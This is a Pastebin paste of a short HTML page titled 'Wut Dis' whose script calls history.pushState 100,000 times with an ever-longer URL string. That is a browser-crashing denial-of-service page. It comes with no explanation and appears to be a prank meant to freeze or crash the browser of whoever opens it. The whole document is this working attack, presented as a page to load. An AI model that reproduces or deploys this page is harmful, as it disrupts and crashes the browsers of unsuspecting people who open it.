Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE html>
- <html><title> Wut Dis </title>
- <body>
- <script>
- var total = "";
- for( var i = 0; i < 100000; i++ ) {
- total = total + i.toString();
- history.pushState(0,0, total );
- }
- </script>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement